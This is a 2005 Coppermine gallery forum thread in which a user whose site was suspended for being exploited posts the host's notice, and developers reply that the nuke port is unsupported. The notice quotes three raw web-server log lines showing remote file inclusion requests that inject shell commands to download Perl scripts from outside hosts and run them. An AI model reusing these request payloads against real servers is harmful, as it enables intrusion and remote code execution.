Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: getting hacked  (Read 32380 times)

0 Members and 1 Guest are viewing this topic.

mrmike987

  • Coppermine newbie
  • Offline Offline
  • Posts: 18
getting hacked
« on: July 07, 2005, 12:46:29 am »

gogclan.com on Server 102 was suspended for
Website Exploit - Coppermine is being exploited, and has been over the past couple of weeks.

Location of Documentation Logs:
Yes, see notes below

Comments added in WHM:
Yes.


Was Client Notified:
Yes, through this suspension.

Any additional notes:
gogclan.com:200.164.108.163 - - [30/Jun/2005:16:40:47 -0400] "GET //modules/coppermine/themes/coppercop/theme.php?THEME_DIR=http://newton.100free.com/newcmd.gif?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.0" 200 12891 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"

gogclan.com:200.210.219.171 - - [02/Jul/2005:03:12:49 -0400] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=http://psc.yoll.net/cmd?&cmd=cd%20/var/tmp;%20GET%20http://geocities.yahoo.com.br/wdteam/beto.txt%20>%20beto.txt;%20chmod%20777%20beto.txtl;%20perl%20beto.txt HTTP/1.0" 200 14798 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.40607)"

gogclan.com:200.165.181.247 - - [06/Jul/2005:15:08:28 -0400] "GET //modules/coppermine/themes/default/theme.php?THEME_DIR=http://mi.verizon.net.do/carlos18/tool25.dot?&cmd=cd%20/tmp;wget%20www.bo0mber.oi.com.br/bd.pl HTTP/1.1" 200 12936 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Logged

kegobeer

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 4637
  • Beer - it does a body good!
    • The Kazebeer Family Website
Re: getting hacked
« Reply #1 on: July 07, 2005, 03:14:13 am »

There is no support for the nuke port of Coppermine.  If you want Coppermine with nuke, you have to use CPG-Nuke.  A google search for coppermine nuke exploit turned up a link to cpgnuke anyway:

http://www.cpgnuke.com/Forums/viewtopic/t=3580.html

The standalone version has no known security holes.  Switch to CPG-Nuke if you want to continue using Coppermine with nuke.
Logged
Do not send me a private message unless I ask for one.  Make your post public so everyone can benefit.

There are no stupid questions
But there are a LOT of inquisitive idiots

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: getting hacked
« Reply #2 on: July 07, 2005, 10:07:35 am »

searching before posting would have helped as well: http://forum.coppermine-gallery.net/index.php?topic=5879.0
Logged
Pages: [1]   Go Up
 

Page created in 0.016 seconds with 18 queries.